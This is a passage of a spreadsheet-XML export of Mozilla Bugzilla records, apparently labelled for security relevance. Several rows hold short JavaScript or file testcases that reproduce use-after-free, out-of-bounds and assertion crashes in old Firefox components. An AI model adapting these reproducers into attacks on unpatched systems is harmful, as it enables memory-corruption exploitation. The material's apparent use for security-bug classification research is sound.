        <is>
          <t>Workers: Possible to release nsGlobalWindow on a background thread</t>
        </is>
      </c>
      <c r="D840" t="inlineStr">
        <is>
          <t>2019-03-13 06:42:05 -0700</t>
        </is>
      </c>
      <c r="E840" t="n">
        <v>1</v>
      </c>
      <c r="F840" t="n">
        <v>1</v>
      </c>
      <c r="G840" t="n">
        <v>3</v>
      </c>
      <c r="H840" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I840" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J840" t="inlineStr">
        <is>
          <t>DOM: Core &amp; HTML</t>
        </is>
      </c>
      <c r="K840" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L840" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M840" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N840" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O840" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P840" t="inlineStr">
        <is>
          <t>[sg:moderate] [qa-noaction-191] [qa-noaction-192]</t>
        </is>
      </c>
      <c r="Q840" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R840" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S840" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T840" t="n">
        <v>1</v>
      </c>
      <c r="U840" t="n">
        <v>0</v>
      </c>
      <c r="V840" t="n">
        <v>9</v>
      </c>
      <c r="W840" t="inlineStr">
        <is>
          <t>Created attachment 431415
Patch
I'm utterly surprised, but the nsISupportsHashKey implementation actually addrefs/releases its key value when used. Simple fix.</t>
        </is>
      </c>
      <c r="X840" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="841">
      <c r="A841" t="n">
        <v>1193038</v>
      </c>
      <c r="B841" t="inlineStr">
        <is>
          <t>2015-08-10 14:36:46 -0700</t>
        </is>
      </c>
      <c r="C841" t="inlineStr">
        <is>
          <t>UAF in Telemetry::Accumulate(); code appears to not be thread-safe</t>
        </is>
      </c>
      <c r="D841" t="inlineStr">
        <is>
          <t>2016-07-02 11:18:44 -0700</t>
        </is>
      </c>
      <c r="E841" t="n">
        <v>1</v>
      </c>
      <c r="F841" t="n">
        <v>1</v>
      </c>
      <c r="G841" t="n">
        <v>3</v>
      </c>
      <c r="H841" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I841" t="inlineStr">
        <is>
          <t>Toolkit</t>
        </is>
      </c>
      <c r="J841" t="inlineStr">
        <is>
          <t>Telemetry</t>
        </is>
      </c>
      <c r="K841" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L841" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M841" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N841" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O841" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P841" t="inlineStr">
        <is>
          <t>[post-critsmash-triage][adv-main42+][adv-esr38.4+]</t>
        </is>
      </c>
      <c r="Q841" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R841" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S841" t="inlineStr">
        <is>
          <t>mozilla43</t>
        </is>
      </c>
      <c r="T841" t="n">
        <v>1</v>
      </c>
      <c r="U841" t="n">
        <v>0</v>
      </c>
      <c r="V841" t="n">
        <v>74</v>
      </c>
      <c r="W841" t="inlineStr">
        <is>
          <t>Repeated crashes in the field with 0x5a signatures.  
Called from
Telemetry::Accumulate(Telemetry::DNS_FAILED_LOOKUP_TIME, millis);
https://crash-stats.mozilla.com/report/index/aabb2399-64d7-4ec7-a888-027b02150805
There is no obvious mention anywhere in the Telemetry code/includes about the thread-safety aspects; thus one should presume it's callable from any thread (and in this case is, from a DNS resolver thread, STS thread, etc).  However, I see no locking around access to shared telemetry structures, which presumably led to this set of crashes.  I would imagine it's also prone to TSAN issues.
The only good thing is that few of the crashes are on Release since most telemetry is disabled on Release (IIRC).  But not all....
Others include  Telemetry::Accumulate(Telemetry::STS_NUMBER_OF_ONSOCKETREADY_CALLS, numberOfOnSocketReadyCalls)
(https://crash-stats.mozilla.com/report/index/c77f5b7c-cc39-44d3-9664-030ff2150807)
More crashes, all ugly:
https://crash-stats.mozilla.com/report/list?product=Firefox&amp;signature=mozilla%3A%3ATelemetry%3A%3AAccumulate%28mozilla%3A%3ATelemetry%3A%3AID%2C+unsigned+int%29</t>
        </is>
      </c>
      <c r="X841" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="842">
      <c r="A842" t="n">
        <v>1000960</v>
      </c>
      <c r="B842" t="inlineStr">
        <is>
          <t>2014-04-24 09:34:04 -0700</t>
        </is>
      </c>
      <c r="C842" t="inlineStr">
        <is>
          <t>Assertion failure: isObject(), at js/Value.h:1156 or Crash [@ JSObject::getGeneric]</t>
        </is>
      </c>
      <c r="D842" t="inlineStr">
        <is>
          <t>2015-08-30 12:11:40 -0700</t>
        </is>
      </c>
      <c r="E842" t="n">
        <v>1</v>
      </c>
      <c r="F842" t="n">
        <v>1</v>
      </c>
      <c r="G842" t="n">
        <v>3</v>
      </c>
      <c r="H842" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I842" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J842" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K842" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L842" t="inlineStr">
        <is>
          <t>ARM</t>
        </is>
      </c>
      <c r="M842" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N842" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O842" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P842" t="inlineStr">
        <is>
          <t>[adv-main30+]</t>
        </is>
      </c>
      <c r="Q842" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R842" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S842" t="inlineStr">
        <is>
          <t>mozilla32</t>
        </is>
      </c>
      <c r="T842" t="n">
        <v>1</v>
      </c>
      <c r="U842" t="n">
        <v>0</v>
      </c>
      <c r="V842" t="n">
        <v>25</v>
      </c>
      <c r="W842" t="inlineStr">
        <is>
          <t>The following testcase asserts on mozilla-central revision 1d0496e30feb (x86 ARM simulator build, run with --fuzzing-safe --ion-eager):
function testFloat32SetElemIC(a) {
  for (var i = 0; i &lt; a.length; i++) {
    var r = Math.fround(Number.MAX_VALUE);
    a[i] = r;
    assertEq(a[i], r);
  }
}
testFloat32SetElemIC(new Array(2048));
testFloat32SetElemIC(new Float32Array(2048));</t>
        </is>
      </c>
      <c r="X842" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="843">
      <c r="A843" t="n">
        <v>1119579</v>
      </c>
      <c r="B843" t="inlineStr">
        <is>
          <t>2015-01-08 16:13:39 -0800</t>
        </is>
      </c>
      <c r="C843" t="inlineStr">
        <is>
          <t>Assertion failure: !comp.ref().done(), at gc/Zone.h</t>
        </is>
      </c>
      <c r="D843" t="inlineStr">
        <is>
          <t>2016-06-04 16:13:06 -0700</t>
        </is>
      </c>
      <c r="E843" t="n">
        <v>1</v>
      </c>
      <c r="F843" t="n">
        <v>1</v>
      </c>
      <c r="G843" t="n">
        <v>3</v>
      </c>
      <c r="H843" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I843" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J843" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K843" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L843" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M843" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N843" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O843" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P843" t="inlineStr">
        <is>
          <t>[adv-main36+][adv-esr31.5+]</t>
        </is>
      </c>
      <c r="Q843" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R843" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S843" t="inlineStr">
        <is>
          <t>mozilla37</t>
        </is>
      </c>
      <c r="T843" t="n">
        <v>1</v>
      </c>
      <c r="U843" t="n">
        <v>0</v>
      </c>
      <c r="V843" t="n">
        <v>25</v>
      </c>
      <c r="W843" t="inlineStr">
        <is>
          <t>The upcoming testcase asserts js debug shell on m-c changeset 70de2960aa87 with  --fuzzing-safe --gc-zeal=14 --no-threads --ion-eager at Assertion failure: !comp.ref().done(), at gc/Zone.h
Debug configure options:
CC="clang -Qunused-arguments" CXX="clang++ -Qunused-arguments" AR=ar AUTOCONF=/usr/local/Cellar/autoconf213/2.13/bin/autoconf213 sh /Users/skywalker/trees/mozilla-central/js/src/configure --target=x86_64-apple-darwin12.5.0 --enable-debug --enable-optimize --enable-nspr-build --enable-more-deterministic --with-ccache --enable-gczeal --enable-debug-symbols --disable-tests
This was found by combining random js tests together with jsfunfuzz, the specific file(s) is/are:
http://hg.mozilla.org/mozilla-central/file/70de2960aa87/js/src/tests/ecma/LexicalConventions/7.4.3-14-n.js
http://hg.mozilla.org/mozilla-central/file/70de2960aa87/js/src/jit-test/tests/TypedObject/jit-read-unsized.js
http://hg.mozilla.org/mozilla-central/file/70de2960aa87/js/src/jit-test/tests/ion/bug725000.js
http://hg.mozilla.org/mozilla-central/file/70de2960aa87/js/src/jit-test/tests/debug/Debugger-onNewGlobalObject-02.js
http://hg.mozilla.org/mozilla-central/file/70de2960aa87/js/src/jit-test/tests/debug/Debugger-findAllGlobals-01.js
A bisection is coming up.
Setting s-s as a start since this is a scary assert, as Shu-yu puts it over IRC. Also setting needinfo? from him.</t>
        </is>
      </c>
      <c r="X843" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="844">
      <c r="A844" t="n">
        <v>1184500</v>
      </c>
      <c r="B844" t="inlineStr">
        <is>
          <t>2015-07-16 04:51:07 -0700</t>
        </is>
      </c>
      <c r="C844" t="inlineStr">
        <is>
          <t>Out of bounds write in mar_read.c</t>
        </is>
      </c>
      <c r="D844" t="inlineStr">
        <is>
          <t>2024-05-30 09:03:17 -0700</t>
        </is>
      </c>
      <c r="E844" t="n">
        <v>1</v>
      </c>
      <c r="F844" t="n">
        <v>1</v>
      </c>
      <c r="G844" t="n">
        <v>3</v>
      </c>
      <c r="H844" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I844" t="inlineStr">
        <is>
          <t>Toolkit</t>
        </is>
      </c>
      <c r="J844" t="inlineStr">
        <is>
          <t>Application Update</t>
        </is>
      </c>
      <c r="K844" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L844" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M844" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N844" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O844" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P844" t="inlineStr">
        <is>
          <t>[adv-main40+][adv-esr38.2+]</t>
        </is>
      </c>
      <c r="Q844" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R844" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S844" t="inlineStr">
        <is>
          <t>mozilla42</t>
        </is>
      </c>
      <c r="T844" t="n">
        <v>1</v>
      </c>
      <c r="U844" t="n">
        <v>0</v>
      </c>
      <c r="V844" t="n">
        <v>23</v>
      </c>
      <c r="W844" t="inlineStr">
        <is>
          <t>Created attachment 8634667
testcase.zip
While opening a mar file it's possible to trigger an out of bounds write with a very long item file name (near 4 GB, so it's work only on 64bit).
This will happen before any signature or size check so it's can be triggered during a normal update process.
To reproduce extract the update.mar and try an update with an 64bit updater or use the mar tool like 'mar -t ./update.mar'</t>
        </is>
      </c>
      <c r="X844" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="845">
      <c r="A845" t="n">
        <v>1386633</v>
      </c>
      <c r="B845" t="inlineStr">
        <is>
          <t>2017-08-02 06:49:48 -0700</t>
        </is>
      </c>
      <c r="C845" t="inlineStr">
        <is>
          <t>Remove experiment_id and experiment_branch from quantum_rc</t>
        </is>
      </c>
      <c r="D845" t="inlineStr">
        <is>
          <t>2022-07-26 12:18:12 -0700</t>
        </is>
      </c>
      <c r="E845" t="n">
        <v>1</v>
      </c>
      <c r="F845" t="n">
        <v>1</v>
      </c>
      <c r="G845" t="n">
        <v>2</v>
      </c>
      <c r="H845" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I845" t="inlineStr">
        <is>
          <t>Data Platform and Tools</t>
        </is>
      </c>
      <c r="J845" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K845" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L845" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M845" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N845" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O845" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P845" t="inlineStr"/>
      <c r="Q845" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R845" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S845" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T845" t="n">
        <v>1</v>
      </c>
      <c r="U845" t="n">
        <v>0</v>
      </c>
      <c r="V845" t="n">
        <v>2</v>
      </c>
      <c r="W845" t="inlineStr">
        <is>
          <t>This is creating double counts. I'll also have to backfill all of the data.</t>
        </is>
      </c>
      <c r="X845" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="846">
      <c r="A846" t="n">
        <v>1553719</v>
      </c>
      <c r="B846" t="inlineStr">
        <is>
          <t>2019-05-22 20:36:30 -0700</t>
        </is>
      </c>
      <c r="C846" t="inlineStr">
        <is>
          <t>Perfherder compare chooser should trim the revision id</t>
        </is>
      </c>
      <c r="D846" t="inlineStr">
        <is>
          <t>2019-10-01 04:01:58 -0700</t>
        </is>
      </c>
      <c r="E846" t="n">
        <v>1</v>
      </c>
      <c r="F846" t="n">
        <v>1</v>
      </c>
      <c r="G846" t="n">
        <v>7</v>
      </c>
      <c r="H846" t="inlineStr">
        <is>
          <t>Developer Infrastructure</t>
        </is>
      </c>
      <c r="I846" t="inlineStr">
        <is>
          <t>Tree Management</t>
        </is>
      </c>
      <c r="J846" t="inlineStr">
        <is>
          <t>Perfherder</t>
        </is>
      </c>
      <c r="K846" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="L846" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M846" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N846" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O846" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P846" t="inlineStr"/>
      <c r="Q846" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R846" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S846" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T846" t="n">
        <v>1</v>
      </c>
      <c r="U846" t="n">
        <v>0</v>
      </c>
      <c r="V846" t="n">
        <v>5</v>
      </c>
      <c r="W846" t="inlineStr">
        <is>
          <t>I like to copy-paste revision IDs into the perfherder compare chooser, I do not type them out in full.  But sometimes copy paste copies a bit of whitespace on one or both ends of the revision id. If the perfherder compare chooser was able to trim this whitespace (internally, in its memory, don't update the control) then it would make it easier to use.</t>
        </is>
      </c>
      <c r="X846" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="847">
      <c r="A847" t="n">
        <v>563243</v>
      </c>
      <c r="B847" t="inlineStr">
        <is>
          <t>2010-05-02 10:14:18 -0700</t>
        </is>
      </c>
      <c r="C847" t="inlineStr">
        <is>
          <t>(64-bit) Invalid read / write when testcase is run in valgrind</t>
        </is>
      </c>
      <c r="D847" t="inlineStr">
        <is>
          <t>2013-03-20 08:36:42 -0700</t>
        </is>
      </c>
      <c r="E847" t="n">
        <v>1</v>
      </c>
      <c r="F847" t="n">
        <v>1</v>
      </c>
      <c r="G847" t="n">
        <v>3</v>
      </c>
      <c r="H847" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I847" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J847" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K847" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L847" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M847" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N847" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O847" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P847" t="inlineStr">
        <is>
          <t>[sg:critical?][critsmash:resolved] fixed-in-tracemonkey</t>
        </is>
      </c>
      <c r="Q847" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R847" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S847" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T847" t="n">
        <v>1</v>
      </c>
      <c r="U847" t="n">
        <v>0</v>
      </c>
      <c r="V847" t="n">
        <v>19</v>
      </c>
      <c r="W847" t="inlineStr">
        <is>
          <t>Created attachment 442997
valgrind log
(function () {
    for (a in (function () {
        yield Array.reduce()
    })()) function () {}
})()
causes invalid reads and writes when run in a 1.9.2 64-bit Linux shell without -j on 1.9.2 tip. (Pass into 1.9.2 shell as a CLI argument, e.g. ./js a.js)
A valgrind log is attached. This does not seem to occur with TM tip. Setting s-s because I'm not sure how bad this is.</t>
        </is>
      </c>
      <c r="X847" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="848">
      <c r="A848" t="n">
        <v>939472</v>
      </c>
      <c r="B848" t="inlineStr">
        <is>
          <t>2013-11-16 16:58:49 -0800</t>
        </is>
      </c>
      <c r="C848" t="inlineStr">
        <is>
          <t>"Assertion failure: view" with gcslice and neuter</t>
        </is>
      </c>
      <c r="D848" t="inlineStr">
        <is>
          <t>2015-02-25 20:46:39 -0800</t>
        </is>
      </c>
      <c r="E848" t="n">
        <v>1</v>
      </c>
      <c r="F848" t="n">
        <v>1</v>
      </c>
      <c r="G848" t="n">
        <v>3</v>
      </c>
      <c r="H848" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I848" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J848" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K848" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L848" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M848" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N848" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O848" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P848" t="inlineStr">
        <is>
          <t>[fuzzblocker:neuter][adv-main27+]</t>
        </is>
      </c>
      <c r="Q848" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R848" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S848" t="inlineStr">
        <is>
          <t>mozilla28</t>
        </is>
      </c>
      <c r="T848" t="n">
        <v>1</v>
      </c>
      <c r="U848" t="n">
        <v>0</v>
      </c>
      <c r="V848" t="n">
        <v>21</v>
      </c>
      <c r="W848" t="inlineStr">
        <is>
          <t>var a = new Uint8Array();
a.subarray();
gcslice(0);
gcslice(1781);
neuter(a.buffer);
Assertion failure: view, at js/src/vm/TypedArrayObject.cpp:824
Using the trick in bug 929786 comment 4, the first bad revision is:
changeset:   http://hg.mozilla.org/mozilla-central/rev/0efef923cc17
user:        Steve Fink
date:        Tue Oct 15 23:48:01 2013 -0700
summary:     Bug 861925 - Allow grabbing data from ArrayBuffers and neutering them independently (in addition to Steal, which does both at the same time). r=Waldo</t>
        </is>
      </c>
      <c r="X848" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="849">
      <c r="A849" t="n">
        <v>501279</v>
      </c>
      <c r="B849" t="inlineStr">
        <is>
          <t>2009-06-29 19:52:36 -0700</t>
        </is>
      </c>
      <c r="C849" t="inlineStr">
        <is>
          <t>Crash in [@ res0_unpack] at vorbis_res0.c:225</t>
        </is>
      </c>
      <c r="D849" t="inlineStr">
        <is>
          <t>2011-06-13 10:01:48 -0700</t>
        </is>
      </c>
      <c r="E849" t="n">
        <v>1</v>
      </c>
      <c r="F849" t="n">
        <v>1</v>
      </c>
      <c r="G849" t="n">
        <v>3</v>
      </c>
      <c r="H849" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I849" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J849" t="inlineStr">
        <is>
          <t>Audio/Video</t>
        </is>
      </c>
      <c r="K849" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L849" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M849" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N849" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O849" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P849" t="inlineStr">
        <is>
          <t>[sg:critical?]</t>
        </is>
      </c>
      <c r="Q849" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R849" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S849" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T849" t="n">
        <v>1</v>
      </c>
      <c r="U849" t="n">
        <v>0</v>
      </c>
      <c r="V849" t="n">
        <v>23</v>
      </c>
      <c r="W849" t="inlineStr">
        <is>
          <t>Created attachment 385938
testcase
Stack:
#0  res0_unpack at vorbis_res0.c:225
#1  _vorbis_unpack_books at vorbis_info.c:313
#2  vorbis_synthesis_headerin at vorbis_info.c:425
#3  fs_vorbis_decode at fishsound_vorbis.c:131
#4  fish_sound_decode at fishsound_decode.c:117
#5  oggplay_callback_audio at oggplay_callback.c:392
#6  oggz_read_sync at oggz_read.c:483
#7  oggz_read at oggz_read.c:606
#8  oggplay_initialise at oggplay.c:122
Locals:
225	    if(ci-&gt;book_param[info-&gt;booklist[j]]-&gt;maptype==0)goto errout;
(gdb) p j
$6 = 0
(gdb) p info-&gt;booklist[j]
$7 = -1
(gdb) p ci-&gt;book_param[info-&gt;booklist[j]]
$8 = (static_codebook *) 0x0
Crashes trunk with the Vorbis update from bug 500254 applied.  Also crashes decoder_example from Vorbis SVN trunk.</t>
        </is>
      </c>
      <c r="X849" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="850">
      <c r="A850" t="n">
        <v>1009675</v>
      </c>
      <c r="B850" t="inlineStr">
        <is>
          <t>2014-05-13 10:47:16 -0700</t>
        </is>
      </c>
      <c r="C850" t="inlineStr">
        <is>
          <t>Crash when commenting on github.com [@ mozilla::dom::WrapperPromiseCallback::Call(JSContext*, JS::Handle&lt;JS::Value&gt;]</t>
        </is>
      </c>
      <c r="D850" t="inlineStr">
        <is>
          <t>2019-03-13 06:42:05 -0700</t>
        </is>
      </c>
      <c r="E850" t="n">
        <v>1</v>
      </c>
      <c r="F850" t="n">
        <v>1</v>
      </c>
      <c r="G850" t="n">
        <v>3</v>
      </c>
      <c r="H850" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I850" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J850" t="inlineStr">
        <is>
          <t>DOM: Core &amp; HTML</t>
        </is>
      </c>
      <c r="K850" t="inlineStr">
        <is>
          <t>31 Branch</t>
        </is>
      </c>
      <c r="L850" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M850" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N850" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O850" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P850" t="inlineStr">
        <is>
          <t>[GGC][testcase in comment 57][adv-main31+]</t>
        </is>
      </c>
      <c r="Q850" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R850" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S850" t="inlineStr">
        <is>
          <t>mozilla33</t>
        </is>
      </c>
      <c r="T850" t="n">
        <v>1</v>
      </c>
      <c r="U850" t="n">
        <v>0</v>
      </c>
      <c r="V850" t="n">
        <v>96</v>
      </c>
      <c r="W850" t="inlineStr">
        <is>
          <t>This bug was filed from the Socorro interface and is 
report bp-0e3f20b3-f50e-401f-b1a9-c2c312140513.
=============================================================
I've seen this twice in an hour today, both times when clicking to respond on a github issue or pull request.
Here's the other report: https://crash-stats.mozilla.com/report/index/d6a754ad-37f8-4ab9-bd2c-f96b22140513</t>
        </is>
      </c>
      <c r="X850" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="851">
      <c r="A851" t="n">
        <v>709717</v>
      </c>
      <c r="B851" t="inlineStr">
        <is>
          <t>2011-12-12 00:22:40 -0800</t>
        </is>
      </c>
      <c r="C851" t="inlineStr">
        <is>
          <t>Send the compatibility mode when using AMO Search API</t>
        </is>
      </c>
      <c r="D851" t="inlineStr">
        <is>
          <t>2011-12-17 13:56:45 -0800</t>
        </is>
      </c>
      <c r="E851" t="n">
        <v>1</v>
      </c>
      <c r="F851" t="n">
        <v>1</v>
      </c>
      <c r="G851" t="n">
        <v>2</v>
      </c>
      <c r="H851" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I851" t="inlineStr">
        <is>
          <t>Thunderbird</t>
        </is>
      </c>
      <c r="J851" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K851" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L851" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M851" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N851" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O851" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P851" t="inlineStr"/>
      <c r="Q851" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R851" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S851" t="inlineStr">
        <is>
          <t>Thunderbird 11.0</t>
        </is>
      </c>
      <c r="T851" t="n">
        <v>1</v>
      </c>
      <c r="U851" t="n">
        <v>0</v>
      </c>
      <c r="V851" t="n">
        <v>4</v>
      </c>
      <c r="W851" t="inlineStr">
        <is>
          <t>+++ This bug was initially created as a clone of Bug #706387 +++
For search, AMO sends addons that it thinks are compatible. We also do some checking client side, but those checks are redundant because of the server-side checked.
So we need to tell AMO how the client is determining compatibility, much like we do with the update pings.
This bug is about porting bug 706387 from FF, ideally in one go for TB and SM like done in bug 707225. I'll come up with a patch later today unless someone else is faster.</t>
        </is>
      </c>
      <c r="X851" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="852">
      <c r="A852" t="n">
        <v>770684</v>
      </c>
      <c r="B852" t="inlineStr">
        <is>
          <t>2012-07-03 14:44:43 -0700</t>
        </is>
      </c>
      <c r="C852" t="inlineStr">
        <is>
          <t>DOMParser does subresource loads when used from privileged code</t>
        </is>
      </c>
      <c r="D852" t="inlineStr">
        <is>
          <t>2012-10-21 20:48:42 -0700</t>
        </is>
      </c>
      <c r="E852" t="n">
        <v>1</v>
      </c>
      <c r="F852" t="n">
        <v>1</v>
      </c>
      <c r="G852" t="n">
        <v>3</v>
      </c>
      <c r="H852" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I852" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J852" t="inlineStr">
        <is>
          <t>DOM: Core &amp; HTML</t>
        </is>
      </c>
      <c r="K852" t="inlineStr">
        <is>
          <t>16 Branch</t>
        </is>
      </c>
      <c r="L852" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M852" t="inlineStr">
